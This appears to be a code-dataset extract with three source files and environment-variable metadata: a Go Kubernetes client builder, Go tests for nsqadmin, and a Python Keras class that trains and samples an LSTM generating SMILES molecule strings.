services/controller/internal/infra/k8s/client.go
|
package k8s
import (
"github.com/marcosQuesada/k8s-swarm/services/controller/internal/infra/k8s/generated/clientset/versioned"
log "github.com/sirupsen/logrus"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
"os"
)
// BuildInternalClient instantiates internal K8s client
func BuildInternalClient() kubernetes.Interface {
restConfig, err := rest.InClusterConfig()
if err != nil {
log.Fatalf("unable to get In cluster config, error %v", err)
}
client, err := kubernetes.NewForConfig(restConfig)
if err != nil {
log.Fatalf("unable to build client from config, error %v", err)
}
return client
}
// BuildExternalClient instantiates local k8s client with user credentials
func BuildExternalClient() kubernetes.Interface {
kubeConfigPath := os.Getenv("HOME") + "/.kube/config"
config, err := clientcmd.BuildConfigFromFlags("", kubeConfigPath)
if err != nil {
log.Fatalf("unable to get cluster config from flags, error %v", err)
}
client, err := kubernetes.NewForConfig(config)
if err != nil {
log.Fatalf("unable to build client from config, error %v", err)
}
return client
}
// BuildSwarmInternalClient instantiates internal swarm client
func BuildSwarmInternalClient() versioned.Interface {
config, err := rest.InClusterConfig()
if err != nil {
log.Fatalf("unable to get In cluster config, error %v", err)
}
client, err := versioned.NewForConfig(config)
if err != nil {
log.Fatalf("unable to build client from config, error %v", err)
}
return client
}
// BuildSwarmExternalClient instantiates local swarm client with user credentials
func BuildSwarmExternalClient() versioned.Interface {
kubeConfigPath := os.Getenv("HOME") + "/.kube/config"
config, err := clientcmd.BuildConfigFromFlags("", kubeConfigPath)
if err != nil {
log.Fatalf("unable to get cluster config from flags, error %v", err)
}
client, err := versioned.NewForConfig(config)
if err != nil {
log.Fatalf("unable to build client from config, error %v", err)
}
return client
}
|
[
"\"HOME\"",
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
src/github.com/nsqio/nsq/nsqadmin/nsqadmin_test.go
|
package nsqadmin
import (
"fmt"
"io/ioutil"
"net"
"net/http"
"net/url"
"os"
"os/exec"
"testing"
"github.com/nsqio/nsq/internal/test"
"github.com/nsqio/nsq/nsqd"
)
func TestNoLogger(t *testing.T) {
opts := NewOptions()
opts.Logger = nil
opts.HTTPAddress = "127.0.0.1:0"
opts.NSQLookupdHTTPAddresses = []string{"127.0.0.1:4161"}
nsqadmin := New(opts)
nsqadmin.logf(LOG_ERROR, "should never be logged")
}
func TestNeitherNSQDAndNSQLookup(t *testing.T) {
if os.Getenv("BE_CRASHER") == "1" {
opts := NewOptions()
opts.Logger = nil
opts.HTTPAddress = "127.0.0.1:0"
New(opts)
return
}
cmd := exec.Command(os.Args[0], "-test.run=TestNeitherNSQDAndNSQLookup")
cmd.Env = append(os.Environ(), "BE_CRASHER=1")
err := cmd.Run()
test.Equal(t, "exit status 1", fmt.Sprintf("%v", err))
if e, ok := err.(*exec.ExitError); ok && !e.Success() {
return
}
t.Fatalf("process ran with err %v, want exit status 1", err)
}
func TestBothNSQDAndNSQLookup(t *testing.T) {
if os.Getenv("BE_CRASHER") == "1" {
opts := NewOptions()
opts.Logger = nil
opts.HTTPAddress = "127.0.0.1:0"
opts.NSQLookupdHTTPAddresses = []string{"127.0.0.1:4161"}
opts.NSQDHTTPAddresses = []string{"127.0.0.1:4151"}
New(opts)
return
}
cmd := exec.Command(os.Args[0], "-test.run=TestBothNSQDAndNSQLookup")
cmd.Env = append(os.Environ(), "BE_CRASHER=1")
err := cmd.Run()
test.Equal(t, "exit status 1", fmt.Sprintf("%v", err))
if e, ok := err.(*exec.ExitError); ok && !e.Success() {
return
}
t.Fatalf("process ran with err %v, want exit status 1", err)
}
func TestTLSHTTPClient(t *testing.T) {
nsqdOpts := nsqd.NewOptions()
nsqdOpts.TLSCert = "./test/server.pem"
nsqdOpts.TLSKey = "./test/server-key.pem"
nsqdOpts.TLSRootCAFile = "./test/ca.pem"
nsqdOpts.TLSClientAuthPolicy = "require-verify"
_, nsqdHTTPAddr, nsqd := mustStartNSQD(nsqdOpts)
defer os.RemoveAll(nsqdOpts.DataPath)
defer nsqd.Exit()
opts := NewOptions()
opts.HTTPAddress = "127.0.0.1:0"
opts.NSQDHTTPAddresses = []string{nsqdHTTPAddr.String()}
opts.HTTPClientTLSRootCAFile = "./test/ca.pem"
opts.HTTPClientTLSCert = "./test/client.pem"
opts.HTTPClientTLSKey = "./test/client-key.pem"
nsqadmin := New(opts)
nsqadmin.Main()
defer nsqadmin.Exit()
httpAddr := nsqadmin.RealHTTPAddr()
u := url.URL{
Scheme: "http",
Host: httpAddr.String(),
Path: "/api/nodes/" + nsqdHTTPAddr.String(),
}
resp, err := http.Get(u.String())
test.Equal(t, nil, err)
defer resp.Body.Close()
test.Equal(t, resp.StatusCode < 500, true)
}
func mustStartNSQD(opts *nsqd.Options) (*net.TCPAddr, *net.TCPAddr, *nsqd.NSQD) {
opts.TCPAddress = "127.0.0.1:0"
opts.HTTPAddress = "127.0.0.1:0"
opts.HTTPSAddress = "127.0.0.1:0"
if opts.DataPath == "" {
tmpDir, err := ioutil.TempDir("", "nsq-test-")
if err != nil {
panic(err)
}
opts.DataPath = tmpDir
}
nsqd := nsqd.New(opts)
nsqd.Main()
return nsqd.RealTCPAddr(), nsqd.RealHTTPAddr(), nsqd
}
func TestCrashingLogger(t *testing.T) {
if os.Getenv("BE_CRASHER") == "1" {
// Test invalid log level causes error
nsqdOpts := nsqd.NewOptions()
_, _, nsqd := mustStartNSQD(nsqdOpts)
defer os.RemoveAll(nsqdOpts.DataPath)
defer nsqd.Exit()
opts := NewOptions()
opts.LogLevel = "bad"
_ = New(opts)
return
}
cmd := exec.Command(os.Args[0], "-test.run=TestCrashingLogger")
cmd.Env = append(os.Environ(), "BE_CRASHER=1")
err := cmd.Run()
if e, ok := err.(*exec.ExitError); ok && !e.Success() {
return
}
t.Fatalf("process ran with err %v, want exit status 1", err)
}
type mockLogger struct {
Count int
}
func (l *mockLogger) Output(maxdepth int, s string) error {
l.Count++
return nil
}
func TestLogging(t *testing.T) {
nsqdOpts := nsqd.NewOptions()
_, nsqdHTTPAddr, nsqd := mustStartNSQD(nsqdOpts)
defer os.RemoveAll(nsqdOpts.DataPath)
defer nsqd.Exit()
logger := &mockLogger{}
opts := NewOptions()
opts.HTTPAddress = "127.0.0.1:0"
opts.NSQDHTTPAddresses = []string{nsqdHTTPAddr.String()}
opts.Logger = logger
// Test only fatal get through
opts.LogLevel = "FaTaL"
nsqadmin1 := New(opts)
logger.Count = 0
for i := 1; i <= 5; i++ {
nsqadmin1.logf(i, "Test")
}
test.Equal(t, 1, logger.Count)
// Test only warnings or higher get through
opts.LogLevel = "WARN"
nsqadmin2 := New(opts)
logger.Count = 0
for i := 1; i <= 5; i++ {
nsqadmin2.logf(i, "Test")
}
test.Equal(t, 3, logger.Count)
// Test everything gets through
opts.LogLevel = "debuG"
nsqadmin3 := New(opts)
logger.Count = 0
for i := 1; i <= 5; i++ {
nsqadmin3.logf(i, "Test")
}
test.Equal(t, 5, logger.Count)
// Test everything gets through with verbose = true
opts.LogLevel = "fatal"
opts.Verbose = true
nsqadmin4 := New(opts)
logger.Count = 0
for i := 1; i <= 5; i++ {
nsqadmin4.logf(i, "Test")
}
test.Equal(t, 5, logger.Count)
}
|
[
"\"BE_CRASHER\"",
"\"BE_CRASHER\"",
"\"BE_CRASHER\""
] |
[] |
[
"BE_CRASHER"
] |
[]
|
["BE_CRASHER"]
|
go
| 1 | 0 | |
dataset_generation/0_molecular_generation/ddc_pub/ddc_v3_unbiased.py
|
import os
os.environ[
"TF_CPP_MIN_LOG_LEVEL"
] = "3" # Suppress UserWarning of TensorFlow while loading the model
import numpy as np
from datetime import datetime
from functools import wraps
import shutil, zipfile, tempfile, pickle
from tensorflow.keras.layers import (
Input,
Concatenate,
Dense,
TimeDistributed,
BatchNormalization,
)
from tensorflow.compat.v1.keras.layers import (
CuDNNLSTM as LSTM,
)
from tensorflow.keras.models import Model, load_model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.callbacks import ReduceLROnPlateau, LearningRateScheduler
from tensorflow.keras.utils import multi_gpu_model, plot_model
# Custom dependencies
from molvecgen import SmilesVectorizer
from ddc_pub.generators import SmilesGenerator2
from ddc_pub.custom_callbacks import ModelAndHistoryCheckpoint, LearningRateSchedule
def timed(func):
"""
Timer decorator to benchmark functions.
"""
@wraps(func)
def wrapper(*args, **kwargs):
tstart = datetime.now()
result = func(*args, **kwargs)
elapsed = (datetime.now() - tstart).microseconds / 1e6
print("Elapsed time: %.3f seconds." % elapsed)
return result
return wrapper
class DDC:
def __init__(self, **kwargs):
"""
# Arguments
kwargs:
x : model input - np.ndarray of np.bytes_ or np.float64
y : model output - np.ndarray of np.bytes_
model_name : model filename to load - string
dataset_info : dataset information including name, maxlen and charset - hdf5
noise_std : standard deviation of the noise layer in the latent space - float
lstm_dim : size of LSTM RNN layers - int
dec_layers : number of decoder layers - int
td_dense_dim : size of TD Dense layers inbetween the LSTM ones
to suppress network size - int
batch_size : the network's batch size - int
codelayer_dim: dimensionality of the latent space or number of descriptors - int
# Examples of __init__ usage
To *train* a blank model with encoder (autoencoder):
model = ddc.DDC(x = mols,
y = mols,
dataset_info = info,
noise_std = 0.1,
lstm_dim = 256,
dec_layers = 3,
td_dense_dim = 0,
batch_size = 128,
codelayer_dim = 128)
To *train* a blank model without encoder:
model = ddc.DDC(x = descriptors,
y = mols,
dataset_info = info,
noise_std = 0.1,
lstm_dim = 256,
dec_layers = 3,
td_dense_dim = 0,
batch_size = 128)
To *re-train* a saved model with encoder (autoencoder):
model = ddc.DDC(x = mols,
y = mols,
model_name = saved_model_name)
To *re-train* a saved model without encoder:
model = ddc.DDC(x = descriptors,
y = mols,
model_name = saved_model_name)
To *test* a saved model:
model = ddc.DDC(model_name = saved_model_name)
"""
# Identify the mode to start the model in
if "x" in kwargs:
x = kwargs.get("x")
y = kwargs.get("y")
if "model_name" not in kwargs:
self.__mode = "train"
else:
self.__mode = "retrain"
elif "model_name" in kwargs:
self.__mode = "test"
else:
raise NameError("Cannot infer mode from arguments.")
print("Initializing model in %s mode." % self.__mode)
if self.mode == "train":
# Infer input type from type(x)
if type(x[0]) == np.bytes_:
print("Input type is 'binary mols'.")
self.__input_type = "mols" # binary RDKit mols
else:
print("Check input type.")
self.__input_type = "other" # other molecular descriptors
self.__maxlen = (
kwargs.get("dataset_info")["maxlen"] + 10
) # Extend maxlen to avoid breaks in training
self.__charset = kwargs.get("dataset_info")["charset"]
self.__dataset_name = kwargs.get("dataset_info")["name"]
self.__lstm_dim = kwargs.get("lstm_dim", 256)
self.__h_activation = kwargs.get("h_activation", "relu")
self.__bn = kwargs.get("bn", True)
self.__bn_momentum = kwargs.get("bn_momentum", 0.9)
self.__noise_std = kwargs.get("noise_std", 0.01)
self.__td_dense_dim = kwargs.get(
"td_dense_dim", 0
) # >0 squeezes RNN connections with Dense sandwiches
self.__batch_size = kwargs.get("batch_size", 256)
self.__dec_layers = kwargs.get("dec_layers", 2)
self.__codelayer_dim = kwargs.get("codelayer_dim", 128)
# Create the left/right-padding vectorizers
self.__smilesvec1 = SmilesVectorizer(
canonical=False,
augment=True,
maxlength=self.maxlen,
charset=self.charset,
binary=True,
)
self.__smilesvec2 = SmilesVectorizer(
canonical=False,
augment=True,
maxlength=self.maxlen,
charset=self.charset,
binary=True,
leftpad=False,
)
# self.train_gen.next() #This line is needed to set train_gen.dims (to be fixed in HetSmilesGenerator)
self.__input_shape = self.smilesvec1.dims
self.__dec_dims = list(self.smilesvec1.dims)
self.__dec_dims[0] = self.dec_dims[0] - 1
self.__dec_input_shape = self.dec_dims
self.__output_len = self.smilesvec1.dims[0] - 1
self.__output_dims = self.smilesvec1.dims[-1]
# Build data generators
self.__build_generators(x)
# Build full model out of the sub-models
self.__build_model()
# Retrain or Test mode
else:
self.__model_name = kwargs.get("model_name")
# Load the model
self.__load(self.model_name)
if self.mode == "retrain":
# Build data generators
self.__build_generators(x)
# Show the resulting full model
print(self.model.summary())
"""
Architecture properties.
"""
@property
def lstm_dim(self):
return self.__lstm_dim
@property
def h_activation(self):
return self.__h_activation
@property
def bn(self):
return self.__bn
@property
def bn_momentum(self):
return self.__bn_momentum
@property
def noise_std(self):
return self.__noise_std
@property
def td_dense_dim(self):
return self.__td_dense_dim
@property
def batch_size(self):
return self.__batch_size
@property
def dec_layers(self):
return self.__dec_layers
@property
def codelayer_dim(self):
return self.__codelayer_dim
@property
def steps_per_epoch(self):
return self.__steps_per_epoch
@property
def validation_steps(self):
return self.__validation_steps
@property
def input_shape(self):
return self.__input_shape
@property
def dec_dims(self):
return self.__dec_dims
@property
def dec_input_shape(self):
return self.__dec_input_shape
@property
def output_len(self):
return self.__output_len
@property
def output_dims(self):
return self.__output_dims
@property
def batch_input_length(self):
return self.__batch_input_length
#@batch_input_length.setter
#def batch_input_length(self, value):
# self.__batch_input_length = value
# self.__build_sample_model(batch_input_length=value)
"""
Models.
"""
@property
def sample_model(self):
return self.__sample_model
@property
def multi_sample_model(self):
return self.__multi_sample_model
@property
def model(self):
return self.__model
"""
Train properties.
"""
@property
def epochs(self):
return self.__epochs
@property
def clipvalue(self):
return self.__clipvalue
@property
def lr(self):
return self.__lr
@property
def h(self):
return self.__h
"""
Other properties.
"""
@property
def mode(self):
return self.__mode
@property
def dataset_name(self):
return self.__dataset_name
@property
def model_name(self):
return self.__model_name
@property
def input_type(self):
return self.__input_type
@property
def maxlen(self):
return self.__maxlen
@property
def charset(self):
return self.__charset
@property
def smilesvec1(self):
return self.__smilesvec1
@property
def smilesvec2(self):
return self.__smilesvec2
@property
def train_gen(self):
return self.__train_gen
@property
def valid_gen(self):
return self.__valid_gen
"""
Private methods.
"""
def __build_generators(self, x, split=0.81050343):
"""
Build data generators to be used in (re)training.
"""
# Split dataset into train and validation sets
cut = int(split * len(x))
x_train = x[:cut]
x_valid = x[cut:]
self.__train_gen = SmilesGenerator2(
x_train,
None,
self.smilesvec1,
self.smilesvec2,
batch_size=self.batch_size,
shuffle=True,
)
self.__valid_gen = SmilesGenerator2(
x_valid,
None,
self.smilesvec1,
self.smilesvec2,
batch_size=self.batch_size,
shuffle=True,
)
# Calculate number of batches per training/validation epoch
train_samples = len(x_train)
valid_samples = len(x_valid)
self.__steps_per_epoch = train_samples // self.batch_size
self.__validation_steps = valid_samples // self.batch_size
print(
"Model received %d train samples and %d validation samples."
% (train_samples, valid_samples)
)
def __build_model(self):
"""
RNN that generates random SMILES strings.
"""
# This is the start character padded OHE smiles for teacher forcing
decoder_inputs = Input(shape=self.dec_input_shape, name="Decoder_Inputs")
# I/O tensor of the LSTM layers
x = decoder_inputs
for dec_layer in range(self.dec_layers):
# RNN layer
decoder_lstm = LSTM(
self.lstm_dim,
return_sequences=True,
name="Decoder_LSTM_" + str(dec_layer),
)
x = decoder_lstm(x)
if self.bn:
x = BatchNormalization(
momentum=self.bn_momentum, name="BN_Decoder_" + str(dec_layer)
)(x)
# Squeeze LSTM interconnections using Dense layers
if self.td_dense_dim > 0:
x = TimeDistributed(
Dense(self.td_dense_dim), name="Time_Distributed_" + str(dec_layer)
)(x)
# Final Dense layer to return soft labels (probabilities)
outputs = Dense(self.output_dims, activation="softmax", name="Dense_Decoder")(x)
# Define the batch_model
self.__model = Model(inputs=[decoder_inputs], outputs=[outputs])
# Name it!
self.__model._name = "model"
def __build_sample_model(self, batch_input_length) -> dict:
"""
Model that predicts a single OHE character.
This model is generated from the modified config file of the self.batch_model.
Returns:
The dictionary of the configuration.
"""
self.__batch_input_length = batch_input_length
# Get the configuration of the batch_model
config = self.model.get_config()
# Keep only the "Decoder_Inputs" as single input to the sample_model
config["input_layers"] = [config["input_layers"][0]]
# Find decoder states that are used as inputs in batch_model and remove them
idx_list = []
for idx, layer in enumerate(config["layers"]):
if "Decoder_State_" in layer["name"]:
idx_list.append(idx)
# Pop the layer from the layer list
# Revert indices to avoid re-arranging after deleting elements
for idx in sorted(idx_list, reverse=True):
config["layers"].pop(idx)
# Remove inbound_nodes dependencies of remaining layers on deleted ones
for layer in config["layers"]:
idx_list = []
try:
for idx, inbound_node in enumerate(layer["inbound_nodes"][0]):
if "Decoder_State_" in inbound_node[0]:
idx_list.append(idx)
# Catch the exception for first layer (Decoder_Inputs) that has empty list of inbound_nodes[0]
except:
pass
# Pop the inbound_nodes from the list
# Revert indices to avoid re-arranging
for idx in sorted(idx_list, reverse=True):
layer["inbound_nodes"][0].pop(idx)
# Change the batch_shape of input layer
config["layers"][0]["config"]["batch_input_shape"] = (
batch_input_length,
1,
self.dec_input_shape[-1],
)
# Finally, change the statefulness of the RNN layers
for layer in config["layers"]:
if "Decoder_LSTM_" in layer["name"]:
layer["config"]["stateful"] = True
# layer["config"]["return_sequences"] = True
# Define the sample_model using the modified config file
sample_model = Model.from_config(config)
# Copy the trained weights from the trained batch_model to the untrained sample_model
for layer in sample_model.layers:
# Get weights from the batch_model
weights = self.model.get_layer(layer.name).get_weights()
# Set the weights to the sample_model
sample_model.get_layer(layer.name).set_weights(weights)
if batch_input_length == 1:
self.__sample_model = sample_model
elif batch_input_length > 1:
self.__multi_sample_model = sample_model
return config
def __load(self, model_name):
"""
Load complete model from a zip file.
To be called within __init__.
"""
print("Loading model.")
tstart = datetime.now()
# Temporary directory to extract the zipped information
with tempfile.TemporaryDirectory() as dirpath:
# Unzip the directory that contains the saved model(s)
with zipfile.ZipFile(model_name + ".zip", "r") as zip_ref:
zip_ref.extractall(dirpath)
# Load metadata
metadata = pickle.load(open(dirpath + "/metadata.pickle", "rb"))
# Re-load metadata
self.__dict__.update(metadata)
# Load the model
self.__model = load_model(dirpath + "/model.h5")
# Build sample_model out of the trained batch_model
self.__build_sample_model(batch_input_length=1) # Single-output model
self.__build_sample_model(
batch_input_length=256
) # Multi-output model
print("Loading finished in %i seconds." % ((datetime.now() - tstart).seconds))
"""
Public methods.
"""
def fit(
self,
model_name,
epochs,
lr,
mini_epochs,
patience,
gpus=1,
workers=1,
use_multiprocessing=False,
verbose=2,
max_queue_size=10,
clipvalue=0,
save_period=5,
checkpoint_dir="/",
lr_decay=False,
lr_warmup=False,
sch_epoch_to_start=500,
sch_last_epoch=999,
sch_lr_init=1e-3,
sch_lr_final=1e-6,
):
"""
Fit the full model to the training data.
Supports multi-gpu training if gpus set to >1.
# Arguments
kwargs:
model_name : base name for the checkpoints - string
epochs : number of epochs to train in total - int
lr : initial learning rate of the training - float
mini_epochs : number of dividends of an epoch (==1 means no mini_epochs) - int
patience : minimum consecutive mini_epochs of stagnated learning rate to consider
before lowering it - int
gpus : number of gpus to use for multi-gpu training (==1 means single gpu) - int
workers : number of CPU workers - int
use_multiprocessing: flag for Keras multiprocessing - boolean
verbose : verbosity of the training - int
max_queue_size : max size of the generator queue - int
clipvalue : value of gradient clipping - float
save_period : mini_epochs every which to checkpoint the model - int
checkpoint_dir : directory to store the checkpoints - string
lr_decay : flag to use exponential decay of learning rate - boolean
lr_warmup : flag to use warmup for transfer learning - boolean
"""
# Get parameter values if specified
self.__epochs = epochs
self.__lr = lr
self.__clipvalue = clipvalue
# Optimizer
if clipvalue > 0:
print("Using gradient clipping %.2f." % clipvalue)
opt = Adam(lr=self.lr, clipvalue=self.clipvalue)
else:
opt = Adam(lr=self.lr)
checkpoint_file = (
checkpoint_dir + "%s--{epoch:02d}--{val_loss:.4f}--{lr:.7f}" % model_name
)
# If model is untrained, history is blank
try:
history = self.h
# Else, append the history
except:
history = {}
mhcp = ModelAndHistoryCheckpoint(
filepath=checkpoint_file,
model_dict=self.__dict__,
monitor="val_loss",
verbose=1,
mode="min",
period=save_period,
history=history
)
# Training history
self.__h = mhcp.history
if lr_decay:
lr_schedule = LearningRateSchedule(
epoch_to_start=sch_epoch_to_start,
last_epoch=sch_last_epoch,
lr_init=sch_lr_init,
lr_final=sch_lr_final,
)
lr_scheduler = LearningRateScheduler(
schedule=lr_schedule.exp_decay, verbose=1
)
callbacks = [lr_scheduler, mhcp]
elif lr_warmup:
lr_schedule = LearningRateSchedule(
epoch_to_start=sch_epoch_to_start,
last_epoch=sch_last_epoch,
lr_init=sch_lr_init,
lr_final=sch_lr_final,
)
lr_scheduler = LearningRateScheduler(
schedule=lr_schedule.warmup, verbose=1
)
callbacks = [lr_scheduler, mhcp]
else:
rlr = ReduceLROnPlateau(
monitor="val_loss",
factor=0.5,
patience=patience,
min_lr=1e-6,
verbose=1,
min_delta=1e-4,
)
callbacks = [rlr, mhcp]
# Inspect training parameters at the start of the training
self.summary()
# Parallel training on multiple GPUs
if gpus > 1:
parallel_model = multi_gpu_model(self.model, gpus=gpus)
parallel_model.compile(loss="categorical_crossentropy", optimizer=opt)
# This `fit` call will be distributed on all GPUs.
# Each GPU will process (batch_size/gpus) samples per batch.
parallel_model.fit_generator(
self.train_gen,
steps_per_epoch=self.steps_per_epoch / mini_epochs,
epochs=mini_epochs * self.epochs,
validation_data=self.valid_gen,
validation_steps=self.validation_steps / mini_epochs,
callbacks=callbacks,
max_queue_size=max_queue_size,
workers=workers,
use_multiprocessing=use_multiprocessing,
verbose=verbose,
) # 1 to show progress bar
elif gpus == 1:
self.model.compile(loss="categorical_crossentropy", optimizer=opt)
self.model.fit_generator(
self.train_gen,
steps_per_epoch=self.steps_per_epoch / mini_epochs,
epochs=mini_epochs * self.epochs,
validation_data=self.valid_gen,
validation_steps=self.validation_steps / mini_epochs,
callbacks=callbacks,
max_queue_size=10,
workers=workers,
use_multiprocessing=use_multiprocessing,
verbose=verbose,
) # 1 to show progress bar
# Build sample_model out of the trained batch_model
self.__build_sample_model(batch_input_length=1) # Single-output model
self.__build_sample_model(
batch_input_length=self.batch_size
) # Multi-output model
# @timed
def predict(self, temp=1, rng_seed=None):
"""
Generate a single SMILES string.
The states of the RNN are set based on the latent input.
Careful, "latent" must be: the output of self.transform()
or
an array of molecular descriptors.
If temp>0, multinomial sampling is used instead of selecting
the single most probable character at each step.
If temp==1, multinomial sampling without temperature scaling is used.
Returns:
A single SMILES string and its NLL.
"""
# Pass rng_seed for repeatable sampling
if rng_seed is not None:
np.random.seed(rng_seed)
# Reset the states between predictions because RNN is stateful!
self.sample_model.reset_states()
# Prepare the input char
startidx = self.smilesvec1._char_to_int[self.smilesvec1.startchar]
samplevec = np.zeros((1, 1, self.smilesvec1.dims[-1]))
samplevec[0, 0, startidx] = 1
smiles = ""
# Initialize Negative Log-Likelihood (NLL)
NLL = 0
# Loop and predict next char
for i in range(1000):
o = self.sample_model.predict(samplevec)
# Multinomial sampling with temperature scaling
if temp:
temp = abs(temp) # Handle negative values
nextCharProbs = np.log(o) / temp
nextCharProbs = np.exp(nextCharProbs)
nextCharProbs = (
nextCharProbs / nextCharProbs.sum() - 1e-8
) # Re-normalize for float64 to make exactly 1.0 for np.random.multinomial
sampleidx = np.random.multinomial(
1, nextCharProbs.squeeze(), 1
).argmax()
# Else, select the most probable character
else:
sampleidx = np.argmax(o)
samplechar = self.smilesvec1._int_to_char[sampleidx]
if samplechar != self.smilesvec1.endchar:
# Append the new character
smiles += samplechar
samplevec = np.zeros((1, 1, self.smilesvec1.dims[-1]))
samplevec[0, 0, sampleidx] = 1
# Calculate negative log likelihood for the selected character given the sequence so far
NLL -= np.log(o[0][0][sampleidx])
else:
return smiles, NLL
# @timed
def predict_batch(self, temp=1, rng_seed=None):
"""
Generate multiple random SMILES strings.
If temp>0, multinomial sampling is used instead of selecting
the single most probable character at each step.
If temp==1, multinomial sampling without temperature scaling is used.
Low temp leads to elimination of characters with low conditional probabilities.
"""
# Pass rng_seed for repeatable sampling
if rng_seed is not None:
np.random.seed(rng_seed)
# Reset the states between predictions because RNN is stateful!
self.multi_sample_model.reset_states()
# Index of input char "^"
startidx = self.smilesvec1._char_to_int[self.smilesvec1.startchar]
# Vectorize the input char for all SMILES
samplevec = np.zeros((self.batch_input_length, 1, self.smilesvec1.dims[-1]))
samplevec[:, 0, startidx] = 1
# Initialize arrays to store SMILES, their NLLs and their status
smiles = np.array([""] * self.batch_input_length, dtype=object)
NLL = np.zeros((self.batch_input_length,))
finished = np.array([False] * self.batch_input_length)
# Loop and predict next char
for i in range(1000):
o = self.multi_sample_model.predict(
samplevec, batch_size=self.batch_input_length
).squeeze()
# Multinomial sampling with temperature scaling
if temp:
temp = abs(temp) # No negative values
nextCharProbs = np.log(o) / temp
nextCharProbs = np.exp(nextCharProbs) # .squeeze()
# Normalize probabilities
nextCharProbs = (nextCharProbs.T / nextCharProbs.sum(axis=1) - 1e-8).T
sampleidc = np.asarray(
[
np.random.multinomial(1, nextCharProb, 1).argmax()
for nextCharProb in nextCharProbs
]
)
else:
sampleidc = np.argmax(o, axis=1)
samplechars = [self.smilesvec1._int_to_char[idx] for idx in sampleidc]
for idx, samplechar in enumerate(samplechars):
if not finished[idx]:
if samplechar != self.smilesvec1.endchar:
# Append the SMILES with the next character
smiles[idx] += self.smilesvec1._int_to_char[sampleidc[idx]]
samplevec = np.zeros(
(self.batch_input_length, 1, self.smilesvec1.dims[-1])
)
# One-Hot Encode the character
# samplevec[:,0,sampleidc] = 1
for count, sampleidx in enumerate(sampleidc):
samplevec[count, 0, sampleidx] = 1
# Calculate negative log likelihood for the selected character given the sequence so far
NLL[idx] -= np.log(o[idx][sampleidc[idx]])
else:
finished[idx] = True
# print("SMILES has finished at %i" %i)
# If all SMILES are finished, i.e. the endchar "$" has been generated, stop the generation
if finished.sum() == len(finished):
return smiles, NLL
@timed
def get_smiles_nll(self, smiles_ref) -> float:
"""
Calculate the NLL of a given SMILES string if its descriptors are used as RNN states.
Returns:
The NLL of sampling a given SMILES string.
"""
# Reset the states between predictions because RNN is stateful!
self.sample_model.reset_states()
# Prepare the input char
startidx = self.smilesvec1._char_to_int[self.smilesvec1.startchar]
samplevec = np.zeros((1, 1, self.smilesvec1.dims[-1]))
samplevec[0, 0, startidx] = 1
# Initialize Negative Log-Likelihood (NLL)
NLL = 0
# Loop and predict next char
for i in range(1000):
o = self.sample_model.predict(samplevec)
samplechar = smiles_ref[i]
sampleidx = self.smilesvec1._char_to_int[samplechar]
if i != len(smiles_ref) - 1:
samplevec = np.zeros((1, 1, self.smilesvec1.dims[-1]))
samplevec[0, 0, sampleidx] = 1
# Calculate negative log likelihood for the selected character given the sequence so far
NLL -= np.log(o[0][0][sampleidx])
else:
return NLL
@timed
def get_smiles_nll_batch(self, smiles_ref) -> list:
"""
Calculate the individual NLL for a batch of known SMILES strings.
Batch size is equal to self.batch_input_length so reset it if needed.
Returns:
NLL of sampling all listed SMILES.
"""
# Reset the states between predictions because RNN is stateful!
self.multi_sample_model.reset_states()
# Index of input char "^"
startidx = self.smilesvec1._char_to_int[self.smilesvec1.startchar]
# Vectorize the input char for all SMILES
samplevec = np.zeros((self.batch_input_length, 1, self.smilesvec1.dims[-1]))
samplevec[:, 0, startidx] = 1
# Initialize arrays to store NLLs and flag if a SMILES is finished
NLL = np.zeros((self.batch_input_length,))
finished = np.array([False] * self.batch_input_length)
# Loop and predict next char
for i in range(1000):
o = self.multi_sample_model.predict(
samplevec, batch_size=self.batch_input_length
).squeeze()
samplechars = []
for smiles in smiles_ref:
try:
samplechars.append(smiles[i])
except:
# This is a finished SMILES, so "i" exceeds dimensions
samplechars.append("$")
sampleidc = np.asarray(
[self.smilesvec1._char_to_int[char] for char in samplechars]
)
for idx, samplechar in enumerate(samplechars):
if not finished[idx]:
if i != len(smiles_ref[idx]) - 1:
samplevec = np.zeros(
(self.batch_input_length, 1, self.smilesvec1.dims[-1])
)
# One-Hot Encode the character
for count, sampleidx in enumerate(sampleidc):
samplevec[count, 0, sampleidx] = 1
# Calculate negative log likelihood for the selected character given the sequence so far
NLL[idx] -= np.log(o[idx][sampleidc[idx]])
else:
finished[idx] = True
# If all SMILES are finished, i.e. the endchar "$" has been generated, stop the generation
if finished.sum() == len(finished):
return NLL
def summary(self):
"""
Echo the training configuration for inspection.
"""
print(
"\nModel trained with dataset %s that has maxlen=%d and charset=%s for %d epochs."
% (self.dataset_name, self.maxlen, self.charset, self.epochs)
)
print(
"noise_std: %.6f, lstm_dim: %d, dec_layers: %d, td_dense_dim: %d, batch_size: %d, codelayer_dim: %d, lr: %.6f."
% (
self.noise_std,
self.lstm_dim,
self.dec_layers,
self.td_dense_dim,
self.batch_size,
self.codelayer_dim,
self.lr,
)
)
def get_graphs(self):
"""
Export the graphs of the model and its submodels to png files.
Requires "pydot" and "graphviz" to be installed (pip install graphviz && pip install pydot).
"""
try:
from keras.utils import plot_model
from keras.utils.vis_utils import model_to_dot
# from IPython.display import SVG
plot_model(self.model, to_file="model.png")
print("Model exported to png.")
except:
print("Check pydot and graphviz installation.")
@timed
def save(self, model_name):
"""
Save model in a zip file.
"""
with tempfile.TemporaryDirectory() as dirpath:
# Save the Keras model
self.model.save(dirpath + "/model.h5")
# Exclude unpicklable and unwanted attributes
excl_attr = [
"_DDC__mode", # excluded because it is always identified within self.__init__()
"_DDC__train_gen", # unpicklable
"_DDC__valid_gen", # unpicklable
"_DDC__sample_model", # unpicklable
"_DDC__multi_sample_model", # unpicklable
"_DDC__model",
] # unpicklable
# Cannot deepcopy self.__dict__ because of Keras' thread lock so this is
# bypassed by popping and re-inserting the unpicklable attributes
to_add = {}
# Remove unpicklable attributes
for attr in excl_attr:
to_add[attr] = self.__dict__.pop(attr, None)
# Pickle metadata, i.e. almost everything but the Keras models and generators
pickle.dump(self.__dict__, open(dirpath + "/metadata.pickle", "wb"))
# Zip directory with its contents
shutil.make_archive(model_name, "zip", dirpath)
# Finally, re-load the popped elements for the model to be usable
for attr in excl_attr:
self.__dict__[attr] = to_add[attr]
print("Model saved.")
|
[] |
[] |
[
"TF_CPP_MIN_LOG_LEVEL\""
] |
[]
|
